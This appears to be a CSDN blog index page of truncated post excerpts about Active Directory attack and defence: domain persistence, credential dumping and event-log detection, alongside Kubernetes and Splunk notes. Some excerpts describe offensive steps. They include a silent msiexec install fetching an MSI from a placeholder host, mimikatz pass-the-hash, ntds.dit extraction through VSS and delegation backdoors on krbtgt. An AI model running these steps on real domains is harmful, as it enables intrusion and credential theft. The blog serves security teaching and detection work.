Bypass--的博客_CSDN博客-【红队攻防秘籍】,【PHP 代码审计】,【应急响应实战笔记】领域博主

原创 AD域安全攻防实践（附攻防矩阵图）

以域控为基础架构，通过域控实现对用户和计算机资源的统一管理，带来便利的同时也成为了最受攻击者重点攻击的集权系统。01、攻击篇针对域控的攻击技术，在Windows通用攻击技术的基础上自成一套技术体系，将AD域攻防分为信息收集、权限提升、凭证窃取、横向移动、权限维持等攻击阶段，把域环境下众多且繁杂的攻击行为映射到ATT&CK，梳理成一个AD域攻防矩阵图。（1）域内信息收集当攻击者获得内网某台域...

2023-03-11 18:01:16 1853 1

最近在Windows服务器上安装OpenSSH，意外发现了一个很有意思的技巧，可用来做域内权限维持，废话不多说，直接上步骤。01、利用方式（1）在已经获得权限的Windows服务器上，使用msiexec安装openssh，一行命令静默安装，不需要任何设置。msiexec /i "http://x.x.x.x/OpenSSH-Win64.msi"（2）在默认安装的情况下，配置文件：C:\Progra...

2023-05-23 08:02:01 17

原创 Splunk DB Connect 连接SQL Server报错

01、问题描述使用Splunk DB Connect 连接SQL Server数据库读取数据时，报错信息如下：驱动程序无法使用安全套接字层(SSL)加密建立与SQL Server的安全连接。The driver could not establish a secure connection to SQL Server by using Secure Sockets Layer (SSL) ...

2023-04-24 13:20:00 40

原创一个AK/SK泄露检测的实现思路

01、简介在企业上云的过程中，AK/SK泄露导致的数据泄露事件屡见不鲜。在企业混合云架构下，公有云和私有云都存在大量的AccessKey，如何有效地检测可能的AK/SK泄露事件，一直困扰着企业的安全人员。本文提供了一种比较容易实现的思路，完成AK/SK泄露检测能力的构建，实现类似于阿里云云安全中心AK泄露检测的功能，检测GitHub平台公开源代码中是否包含企业所使用的AK/SK敏感信息。02、实现...

2023-04-21 08:00:33 527

原创云原生安全工具合集

以Docker+K8s为代表的容器技术得到了越来越广泛的应用，从安全攻防的角度，攻击者已经不再满足于容器逃逸，进而攻击整个容器编排平台，如果可以拿下集群管理员权限，其效果不亚于域控失陷。在云原生安全攻防的场景下，甲乙攻防双方对于安全工具的关注点也不一样。本文试图收集一些开源的云原生安全工具，带你一起去了解云原生安全。1、云原生攻防靶场Metarget 是一个脆弱基础设施自动化构建框架，主要用于快速...

2023-04-10 20:13:08 53

原创 Splunk DB Connect 连接MySQL报错CLIENT_PLUGIN_AUTH is required

01、问题描述使用Splunk DB Connect 连接MySQL数据库读库时，报错CLIENT_PLUGIN_AUTH is required，如下图：02、原因分析根据报错信息，查阅相关资料，了解到报错原因：目标数据库为MySQL 5.7，使用的mysql-connector-java-8.0.28.jar，mysql的jar包版本过高。JDBC数据库驱动程序:mysql-con...

2023-03-17 13:44:00 86

原创 splunk 自定义SPL命令关联威胁情报数据

通过自定义SPL命令关联微步情报数据，效果如下：1、安装splunk-sdkcd /data/splunk/etc/apps/search/binpip3 install -t . splunk-sdk2、自定义脚本开发[root@SIEM-P-VC-A001 bin]# more threatquery.py #!/usr/bin/python# -*- coding: ...

2023-03-17 13:07:00 64

原创 K8s集群部署（二进制安装部署详细手册）

一、简介K8s部署主要有两种方式：1、Kubeadm　　Kubeadm是一个K8s部署工具，提供kubeadm init和kubeadm join，用于快速部署Kubernetes集群。2、二进制　　从github下载发行版的二进制包，手动部署每个组件，组成Kubernetes集群。本文通过二进制安装部署的方式在centos7上搭建kubernetes集群...

2023-02-17 19:18:00 613

原创 K8s集群部署（kubeadm安装部署详细手册）

1、简介K8s部署主要有两种方式：1、Kubeadm　　Kubeadm是一个K8s部署工具，提供kubeadm init和kubeadm join，用于快速部署Kubernetes集群。2、二进制　　从github下载发行版的二进制包，手动部署每个组件，组成Kubernetes集群。本文通过kudeadm的方式在centos7上安装kubernetes集群。...

2023-02-17 19:16:00 399

原创基于AD Event日志监测域委派后门

01、简介域委派是指将域内用户的权限委派给服务账号，使得服务账号能以用户权限开展域内活动。攻击者在获取到域控权限后，可以利用约束委派或者基于资源的约束委派实现后门，以实现达到维持权限的目的。基于AD Event日志监视对特定 Active Directory 属性的修改，从而发现可疑的域委派后门。02、约束委派攻击场景假设服务账号配置了到域控的约束性委派，当攻击者控制了服务账号，就可以伪造任意用户...

2023-02-06 20:00:19 181

原创基于AD Event日志监测约束委派攻击

01、简介　假设服务账号配置了到域控的约束性委派，当攻击者获取了服务账号，可以作为变种黄金票据，用作后门权限维持。　基于AD Event日志监测msDS-AllowedToDelegateTo属性的修改，从而发现可疑的约束委派攻击。02、利用方式(1)通过powershell添加test用户到krbtgt的约束委派Import-Module ActiveDirectory$user...

2023-02-06 14:37:00 90

原创基于AD Event日志监测基于资源的约束委派攻击

01、简介　攻击者在获取到域控权限后，可以利用基于资源的约束委派实现后门，通过对krbtgt用户设置委派属性，以实现达到维持权限的目的。基于AD Event日志监测msDS-AllowedToActOnBehalfOfOtherIdentity属性的修改，从而发现可疑的基于资源的约束委派攻击。02、利用方式(1)设置属性值并查询Set-ADUser krbtgt -Principal...

2023-02-03 18:50:00 87

原创域内委派攻击

域委派是指，将域内用户的权限委派给服务账号，使得服务账号能以用户权限开展域内活动。利用委派可获取域管理员权限域委派主要分为三种：非约束性委派约束性委派基于资源的约束性委派在Windows系统中，只有服务账号和主机账号的属性才有委派功能，普通用户默认是没有的。01、非约束委派攻击设置非约束委派主机账号设置非约束委派：活动目录中的computers组内的计算机，双...

2023-01-31 19:28:00 247

原创 Centos8 重启后，同网段可以访问，其他网段访问不了，怎么解决？

现象描述：某应用系统，服务器IP地址：10.224.252.34 ，重启服务器后，同网段10.224.252.0/24 可以正常访问到服务，其他192.168.0.0 网段都无法访问到服务。登录排查：登录服务器查看路由表信息，eth3对应10.224.252.0/24，eth2对应192.0.0.0/8，初步怀疑服务器重启后，eth2 网卡未能正常启动。处理方案：重启网卡eth2后，恢复...

2023-01-30 18:12:00 65

原创 CISSP 考试知识要点总结

第一章：安全与风险管理1.1 安全基本原则(CIA)　　机密性(Confidentiality)加密静止数据(整个磁盘、数据库加密)加密传输(IPSec、SSL、PPTP、SSH)中的数据访问控制(物理和技术的)　　完整性(Integrity)散列(数据完整性)配置管理(系统完整性)变更控制(进程完整性)访问控制(物理和技术的)软件数字签名传输循环冗余校...

2023-01-29 11:04:00 296

原创域内权限维持：SID History后门

01、简介每个用户都有一个关联的安全标识符(SID)，SID History的作用是在域迁移过程中保持域用户的访问权限，即如果迁移后用户的SID改变了，系统会将其原来的SID添加到迁移后用户的SID History属性中，使迁移后的用户保持原有权限、能够访问其原来可以访问的资源。02、利用方式(1)使用域管理员权限查看test用户的SID History属性PS C:\Users\Ad...

2023-01-29 10:11:00 92

原创域内权限维持：注入SSP

01、简介SSP(Security Support Provider)是Windows操作系统安全机制的提供者。简单地说，SSP是个DLL文件，主要用来实现Windows操作系统的身份认证功能。在系统启动时，SSP 将被加载到lsass.exe进程中，攻击者通过自定义恶意的DLL文件，在系统启动时将其加载到lsass.exe进程中，就能够获取lsass.exe进程中的明文密码。这样，即使用户更...

2023-01-29 10:11:00 127

原创域内权限维持：AdminSDHolder

01、简介AdminSDHolder是一个特殊的AD容器，通常作为某些特权组成员的对象的安全模板。Active Directory将采用AdminSDHolder对象的ACL并定期将其应用于所有受保护的AD账户和组，以防止意外和无意的修改并确保对这些对象的访问是安全的。如果攻击者能完全控制AdminSDHolder，那么它就能同时控制域内的许多组，这可以作为域内权限维持的方法。02、利用...

2023-01-29 10:11:00 95

原创域内权限维持：DSRM后门

01、简介每个域控制器都有一个目录还原模式(DSRM)帐户，它的密码是在安装域控时设置的，实际上它对应的就是sam文件里的本地管理员“administrator”，基本很少会被重置，因此有着极强的隐蔽性。攻击者通过获取域控的DSRM密码，就可以使用帐户通过网络登录到域控服务器，从而达到权限维持的目的。02、利用方式(1)获取域内用户Hash使用mimikatz查看域内用户test的NTL...

2023-01-29 10:10:00 84

原创域内权限维持：Skeleton Key（万能密码）

01、简介Skeleton Key(万能密码)，是一种可以对域内权限进行持久化的操作，通过将Skeleton Key注入到lsass进程，无需重启域控即可生效，而且能够在不影响当前域用户正常登录的情况下，让所有域用户使用同一个万能密码进行登录，它只存在于内存中，如果域控制器重启，注入的 Skeleton Key 将会失效。02、利用过程(1)尝试以当前用户身份，查看当前网络资源的连接为空...

2023-01-29 10:03:00 245

原创我的2023年Todo List

2023年，如约而至。回到老家过年，看着许多熟悉的人、熟悉的房子，总感觉一切都好像在昨天。内心难得平静，终于可以停下脚步，去复盘一下自己这一年的经历，收拾一下心情，重新出发。从这几个方面，简单聊聊关于生活，工作和学习。01、生活篇日复一日的生活，似乎很难找到值得回忆的东西，间接性迷茫在杂乱的生活琐事里。我很欣赏那些拥有自己的爱好并长期坚持的人，可能他所坚持热爱的东西，在别人眼里是多么...

2023-01-28 19:16:00 297

原创 2023 Todo List

2023年，如约而至。回到老家过年，看着许多熟悉的人、熟悉的房子，总感觉一切都好像在昨天。内心难得平静，终于可以停下脚步，去复盘一下自己这一年的经历，收拾一下心情，重新出发。从这几个方面，简单聊聊关于生活，工作和学习。01、生活篇日复一日的生活，似乎很难找到值得回忆的东西，间接性迷茫在杂乱的生活琐事里。我很欣赏那些拥有自己的爱好并长期坚持的人，可能他所坚持热爱的东西，在别人眼里是多么地无聊，但试想...

2023-01-28 19:00:25 245

原创基于AD Event日志监测AdminSDHolder

01、简介AdminSDHolder是一个特殊的AD容器，通常作为某些特权组成员的对象的安全模板。Active Directory将采用AdminSDHolder对象的ACL并定期将其应用于所有受保护的AD账户和组，以防止意外和无意的修改并确保对这些对象的访问是安全的。如果攻击者能完全控制AdminSDHolder，那么它就能同时控制域内的许多组，这可以作为域内权限维持的方法。基于AD E...

2023-01-16 00:40:00 440

原创基于AD Event日志识别SID History后门

01、简介每个用户都有一个关联的安全标识符（SID），SID History的作用是在域迁移过程中保持域用户的访问权限，即如果迁移后用户的SID改变了，系统会将其原来的SID添加到迁移后用户的SID History属性中，使迁移后的用户保持原有权限、能够访问其原来可以访问的资源。当攻击者获得了域管理员权限，就可以将SID History作为实现持久化的方法。通过AD Event日志如何找到SID ...

2023-01-13 08:00:16 74

原创基于AD Event日志识别Skeleton Key后门

01、简介Skeleton Key(万能密码)，是一种可以对域内权限进行持久化的操作手法，通过将Skeleton Key注入到lsass进程，无需重启域控即可生效，而且能够在不影响当前域用户正常登录的情况下，让所有域用户使用同一个万能密码进行登录。另外，它只存在于内存中，如果域控制器重启，注入的 Skeleton Key 将会失效。如何发现Skelenton Key的后门行为，基于AD Ev...

2023-01-11 20:03:00 77 1

原创基于AD Event日志实时检测DSRM后门

01、简介每个域控制器都有一个目录还原模式（DSRM）帐户，它的密码是在安装域控时设置的，实际上它对应的就是sam文件里的本地管理员“administrator”，基本很少会被重置，因此有着极强的隐蔽性。攻击者通过获取域控的DSRM密码，就可以使用帐户通过网络登录到域控服务器，从而达到权限维持的目的。域内权限维持的方式有很多，每增加一条安全检测规则，就多一层安全保障。针对DSRM后门，基于AD E...

2023-01-08 21:23:26 232

原创基于AD Event日志监测域内信息探测行为

01、简介当攻击者获得内网某台域内服务器的权限，就会以此为起始攻击点，尽可能地去收集域的信息，以获取域控权限作为内网的终极目标。例如，攻击者会在内网中收集域管理员用户列表和特定敏感用户的信息，通过定位域管理员以找到最佳攻击路径，从而拿到域管理员权限。针对域内信息探测的行为，是攻击者入侵的前兆，基于AD Event日志检测攻击者的信息探测行为，就可以预先给安全管理员发出告警，帮助安全管理员找到网络中...

2022-12-25 22:05:38 569

原创基于AD Event日志识别黄金票据攻击

01、简介黄金票据(Golden Ticket)是基于Kerberos认证的一种攻击方式，常用来做域控权限维持。当攻击者获取到域内krbtgt帐户的SID和HASH，就可以随意伪造域内管理员用户，再加上域帐户krbtgt的密码基本不会更改，即使域管修改了密码，攻击者依然可以通过黄金票据获取域管理员权限。在域环境中，黄金票据无疑是一种特别危险的攻击，是域控权限失陷的特征，基于AD Event日志如何...

2022-12-18 20:08:41 306 1

原创基于AD Event日志检测哈希传递攻击

01、简介哈希传递攻击是基于NTLM认证的一种攻击方式，当我们获得某个管理员用户的密码哈希值，就可以利用密码哈希值进行横向渗透。在域环境中，只有域管理员的哈希值才能进行哈希传递攻击，攻击成功后，可以访问域内任何一台机器。基于AD Event日志如何检测哈希传递攻击，这个就是我们今天探讨的话题。02、哈希传递攻击实例(1)使用mimikatz 进行哈希传递获取域控权限在域环境中，当我们获...

2022-12-08 20:29:00 275

原创基于AD Event日志检测LSASS凭证窃取攻击

01、简介简单介绍一下，LSASS(本地安全机构子系统服务)在本地或域中登录Windows时，用户生成的各种凭证将会存储在LSASS进程的内存中，以便用户不必每次访问系统时重新登录。攻击者在获得起始攻击点后，需要获取目标主机上的相关凭证，以便通过用户凭证进行横向移动，这个技术点最容易关联到的就是获取LSASS内存中保存的用户凭证。一般LSASS窃取凭证有两种方式，第一种就是直接从LSASS...

2022-11-30 00:09:00 395

原创基于AD Event日志检测NTDS凭据转储攻击

01、简介在域环境里，域内用户hash存储在域控制器(ntds.dit)中的数据库文件中，ntds.dit文件是无法直接被复制的。在这种情况下，我们一般可以利用卷影复制服务(VSS)来实现ntds.dit的拷贝，然后下载进行离线分析和破解用户哈希。02、利用VSS实现ntds.dit文件提取(1)vssadminWindows卷影工具，使用Vssadmin来管理VSS，用来创建和删除卷影...

2022-11-06 23:42:00 309

原创基于AD Event日志实时检测GPO后门

01、简介在一些勒索病毒的案例中，我们可以看到这样的案例，攻击者通过域控组策略下发勒索病毒加载脚本，从共享服务器下载并执行勒索病毒样本，从而导致内网大规模范围内的病毒感染事件。在域控这种中央集权系统，通过组策略只需要更改一个组策略对象（GPO），就能影响成千上万的计算机，一旦被恶意利用后果不堪设想。基于勒索病毒攻击感染的场景，组策略对象（GPO）的敏感操作需要实时监控，这是保持内网安全所必需的。那...

2022-10-24 08:00:18 996

原创基于AD Event日志识别域用户密码攻击

01、简介针对域用户密码攻击，攻击者通常都会使用两种攻击方式进行测试，即：暴力破解(Brute Force)和密码喷洒（Password Spraying）。暴力破解（Brute Force）攻击，攻击者通过利用大量猜测和穷举的方式来尝试获取用户口令。密码喷洒（Password Spraying）攻击，针对不同的用户账户使用一两个通用密码进行自动化密码猜测，以此来避免单个账户连续密码猜测被锁定，提...

2022-10-17 08:00:16 1600

原创基于AD Event日志识别DCShadow攻击

01、简介DCShadow攻击，是攻击者在获取到域管理员权限后，通过将沦陷的主机伪造成域控，将预先设定的对象或对象属性复制到正在运行的域控服务器中。DCSync&DCShadow区别在于，DCSync是从域服务器将数据复制出来，而DCShadow是将伪造的数据复制到域服务器。02、攻击过程示例假设我们已经拿到了某台服务器SYSTEM权限，并从沦陷的服务器中获取到了域管理员的账号密码。第一步...

2022-10-08 08:00:25 251

原创基于AD Event日志识别DCSync攻击

01、简介DCSync攻击是一种常见的域控攻击方法，利用DCSync导出域内用户的哈希值，本质上就是利用DRS(Directory Replication Service)协议通过 IDL_DRSGetNCChanges 从域控制器复制用户哈希凭据，以便进一步进行利用。02、DCSync攻击手法（1）MimikatzGithub项目地址：https://github.com/gentilkiwi/...

2022-09-07 08:00:04 995

原创 Exchange 暴力破解与防范

针对Exchange漏洞的利用有很多种方式，但大多数攻击手法首先要有一个邮箱账号，所以，最重要的一步就是获取邮箱账号。获取邮箱账号最常见的攻击方式有两种，钓鱼邮件以及暴力破解。本文整理了Exchange暴力破解的方式，以及记录和分享一些防范方面的小技巧。01、Exchange暴力破解（1）OWA登录爆破Exchange邮箱登录界面，默认没有验证码，也没有登录爆破限制，可通过BurpSuite尝试遍...

2022-08-25 08:00:01 1279

原创获取 Spring heapdump中的密码明文

Actuator是Spring Boot提供的应用系统监控的开源框架。在攻防场景里经常会遇到Actuator配置不当的情况，攻击者可以直接下载heapdump堆转储文件，然后通过一些工具来分析heapdump文件，从而可进一步获取敏感信息。01、jvisualvm分析jvisualvm是jdk自带可视化java监控工具，在cmd命令行直接输入jvisualvm就可以运行这款工具。(1)通过...

2022-07-19 07:32:00 2314

原创绕过接口参数签名验证

在一些关键业务接口，系统通常会对请求参数进行签名验证，一旦篡改参数服务端就会提示签名校验失败。在黑盒渗透过程中，如果没办法绕过签名校验，那么就无法进一步深入。微信小程序的前端代码很容易被反编译，一旦签名加密算法和密钥暴漏，找到参数的排序规则，那么就可以篡改任意数据并根据算法伪造签名。下面我们将通过两个简单的小程序参数签名绕过的案例，来理解签名逆向的过程。01、常见签名算法...

2022-07-11 08:00:53 2300

原创记一次Emotet木马处理案例

0x00、前言用户的安全意识相对薄弱，面对来历不明的链接和附件，容易被诱导从而遭受木马的入侵。在日常使用过程中，有时电脑中病毒后会遇到木马查杀不掉的情况，应该是如何处理呢？下面分享一个Emotet木马处理的案例，希望对你有所帮助。0x01、案例说明从流量侧监控到多个用户终端频繁发送邮件，涉及大量收件人与发件人并带有附件，疑似感染木马，用户手动杀软查杀无果。0x02、原因分析既然杀软无法......

2022-06-30 09:06:34 853 1

原创业务逻辑安全思路总结

在一些关键的业务场景里，我们最应该关注的安全问题是什么呢？想到这，发现挺有意思的，于是我重新去梳理了一下业务逻辑方面的内容，做了一张关于业务逻辑安全的思维导图，在整理的过程中，自己的思路越加清晰。分享给屏幕前的你，希望你亦有所获。如有遗漏，欢迎补充。01、防前端绕过前端校验增加用户体验，后端校验才能保障接口安全性。漏洞案例：支付计价的逻辑写在前端，后端没有做数据校验，从而导致0元支付...

2022-06-21 08:59:00 2909

《恶意代码分析实战》官方实验样本

应急响应实战笔记_2020最新版.pdf

WAF攻防实战笔记v1.0--Bypass.pdf

空空如也